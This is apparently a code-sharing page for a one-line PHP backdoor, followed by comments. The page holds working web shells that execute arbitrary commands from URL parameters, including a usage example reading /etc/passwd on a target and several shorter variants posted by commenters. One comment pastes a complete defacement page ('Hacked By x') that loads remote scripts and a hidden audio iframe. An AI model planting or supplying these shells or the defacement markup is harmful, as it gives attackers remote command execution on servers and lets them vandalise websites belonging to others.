Simple-Backdoor-One-Liner.php

<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

This article puts detailed light on php shell backdoors. https://secure.wphackedhelp.com/blog/web-shell-php-exploit/

Goodjob

Dhd

HELLO

<title>Hacked By x</title>
<br>
<div align="Center"><p><font face="tahoma" size="5" color="Gainsboro">
        <b>Hacked By x</b></font></p></div>
<br>
<koddostu>
        <script src="http://e-mete.com/js/kdsnow.js"></script>
        </koddostu>
        <!--Kar Kodu-->
        <script src="https://www.koddostu.com/duzelt.js?no=111"></script>
<div align="Center"><p><font face="tahoma" size="4" color="maroon">
        <b>Site de açık var :)</b></font></p></div>
    <br>
    <div align="Center"><p><font face="tahoma" size="3" color="Gainsboro">
            <b>Bu x Kim mi <br>

                x
            </b></font></p></div>
            <br>
        <div align="center"><img src="https://iasbh.tmgrup.com.tr/cebe2c/0/0/0/0/0/0?u=https://isbh.tmgrup.com.tr/sb/album/2018/07/15/en-guzel-turk-bayragi-resimleri-2016-turk-bayragi-resimleri-1531638269419.jpg"></div>
        <br>

        <div align="Center"><img src="https://image.ibb.co/ivXwhq/bloggif-5be1a20877888.gif"></div>
        <br>
       <div align="Center"<p><font face="tahoma" size="5" color="Gainsboro">
            <b>Türk Olmak Ayrıcalıktır</b></font></p></div>

<iframe width="1" height="1" src="https://instaud.io/_/3UPT.mp3" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen=""></iframe>

<style type="text/css">div.tyg{position:fixed;text-align:left;}div.ght{top:50%;left:50%;width:475px;height:160px;border:1px solid #d8d8d8;-webkit-border-radius: 3px;-moz-border-radius: 3px;border-radius: 3px;margin-top:-200px;margin-left:-236px;}</style><style type="text/css">div.tyg:before, div.tyg:after{content:"";position:absolute;z-index:-1 !important;-webkit-box-shadow:0 1px 8px rgba(0,0,0,0.8);-moz-box-shadow:0 1px 8px rgba(0,0,0,0.8);box-shadow:0 1px 8px rgba(0,0,0,0.8);top:0;bottom:0;left:10px;right:10px;-moz-border-radius:100px / 10px;border-radius:100px / 10px;}.tyg h1{font-family:Arial, sans-serif;font-size:15px;color:#888;display:block;background:transparent;height:44px;margin-top:0px;margin-bottom:3px;line-height:44px;padding-left:10px;}.tyg h1 a{font-family:Arial, sans-serif;font-size:15px;color:#888;line-height:44px;text-decoration:none !important;}</style><style>.tyg span{display:block;width:26px;height:24px;position:absolute;top:8px;right:8px;background:url(http://1.bp.blogspot.com/-CRX8xFlnOjU/UhsVq6UJdLI/AAAAAAAAcFo/DDuHXcTNAlY/s28/Close_button_red.png) no-repeat -1px -1px;cursor:pointer;opacity:0.7;}.tyg span:hover{opacity:1;}.tyg span:active{opacity:0.4;}div.tyg:after{right:10px;left:auto;-webkit-transform:skew(8deg) rotate(3deg);-moz-transform:skew(8deg) rotate(3deg);-ms-transform:skew(8deg) rotate(3deg);-o-transform:skew(8deg) rotate(3deg);transform:skew(8deg) rotate(3deg);} .tyg div{position:absolute;z-index:600;top:0px;left:0px;width:475px;height:160px;background: rgb(255,255,255);background: -moz-linear-gradient(top, rgba(255,255,255,1) 0%, rgba(224,224,224,1) 27%, rgba(255,255,255,1) 27%, rgba(216,216,216,1) 27%, rgba(255,255,255,1) 27%, rgba(255,255,255,1) 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,rgba(255,255,255,1)), color-stop(27%,rgba(224,224,224,1)), color-stop(27%,rgba(255,255,255,1)), color-stop(27%,rgba(216,216,216,1)), color-stop(27%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,1)));background: -webkit-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(224,224,224,1) 27%,rgba(255,255,255,1) 27%,rgba(216,216,216,1) 27%,rgba(255,255,255,1) 27%,rgba(255,255,255,1) 100%);background: -o-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(224,224,224,1) 27%,rgba(255,255,255,1) 27%,rgba(216,216,216,1) 27%,rgba(255,255,255,1) 27%,rgba(255,255,255,1) 100%);background: -ms-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(224,224,224,1) 27%,rgba(255,255,255,1) 27%,rgba(216,216,216,1) 27%,rgba(255,255,255,1) 27%,rgba(255,255,255,1) 100%);background: linear-gradient(to bottom, rgba(255,255,255,1) 0%,rgba(224,224,224,1) 27%,rgba(255,255,255,1) 27%,rgba(216,216,216,1) 27%,rgba(255,255,255,1) 27%,rgba(255,255,255,1) 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#ffffff',GradientType=0 );} div.tyg{_position:absolute;-webkit-box-shadow:0 1px 2px rgba(0, 0, 0, 0.3), 0 0 20px rgba(0, 0, 0, 0.1) inset;-moz-box-shadow:0 1px 2px rgba(0, 0, 0, 0.3), 0 0 20px rgba(0, 0, 0, 0.1) inset;box-shadow:0 1px 2px rgba(0, 0, 0, 0.3), 0 0 20px rgba(0, 0, 0, 0.1) inset;}.ght p{font-family:Helvetica, Arial, sans-serif;font-size:13px;font-weight:normal;color:#444;padding:18px;text-decoration:none;}.ght p a:link{font-family:Helvetica, Arial, sans-serif;font-size:13px;font-weight:normal;color:#c44;text-decoration:underline;}div.ght{_bottom:auto;_top:expression(ie6=(document.documentElement.scrollTop+document.documentElement.clientHeight - 52+"px") );}</style>

Bilgi Mesajı

Hacked By x // Koswog.com

@sente Good Work! Dude
I had tried this shell with my localhost its pretty working but
I can't create directory anywhere using that url
index.php?cmd=mkdir+/root/Desktop/salman
while i can list my directory using :
index.php?cmd=ls+/root/Desktop
Why is it happening?
I m using linux + Mozilla firefox

A smaller one!

<?=`$_GET[_]`?> 

pico webshell

@NaheelSalman
Seems like you are low privellaged user, so your are not able to make directory on /root
you can try making one on /tmp

@NaheelSalman Seems like you are low privellaged user, so your are not able to make directory on /root you can try making one on /tmp

got it

A smaller one!

<?=`$_GET[_]`?> 

pico webshell

Alternative

<?=`$_GET[0]`?>

localhost/shell.php?0=ls